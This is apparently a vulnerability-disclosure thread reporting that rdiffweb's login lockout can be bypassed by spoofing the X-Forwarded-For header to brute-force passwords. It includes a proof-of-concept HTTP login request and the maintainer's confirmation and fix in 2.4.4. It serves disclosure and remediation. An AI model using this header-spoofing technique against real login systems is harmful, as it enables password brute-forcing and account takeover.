Bypass IP detection to brute-force password in ikus060/rdiffweb in ikus060/rdiffweb


Reported on

Sep 14th 2022


In login API, by default, the IP address will be blocked when the user tries to login incorrectly more than 5 times but we can bypass this mechanism by abuse X-Forwarded-For header to bypass IP dectection and perform password brute-force.

Proof of Concept

POST /login/ HTTP/1.1
Cookie: session_id=79c34d46cd0e592e066e1a7b128cffee4972d4f7
Content-Length: 42
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: // Change IP
Connection: close


Video POC


This vulnerabiliy allow the attacker can perform bruteforce admin's password, perform deny of services attack, ...

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. a year ago
ikus060/rdiffweb maintainer has acknowledged this report a year ago
Patrik Dufresne
a year ago


@co0k13-cypher This is true only if Rdiffweb is not behind a reverse proxy. When rdiffweb is behind a reverse proxy the X-Forward-* header get replace by apache or nginx. In case of the vulnerability is not reproducable.

a year ago


In the demo video I'm doing the attack right on site itself, while the vulnerability doesn't cover all cases, that doesn't mean it doesn't happen.

Patrik Dufresne validated this vulnerability a year ago

I confirm the vulnerability.

Chiencp has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Patrik Dufresne
a year ago


@co0k13-cypher May you plz change the affected version to 2.4.2 and earlier ?

Patrik Dufresne marked this as fixed in 2.4.4 with commit 28258e a year ago
Patrik Dufresne has been awarded the fix bounty
This vulnerability will not receive a CVE
a year ago


I'm sorry the report was closed so i can't edit !

Patrik Dufresne
a year ago


@admin May you help to change the affected version to 2.4.2 and earlier ?

Jamie Slome
a year ago


Sorted :)

to join this conversation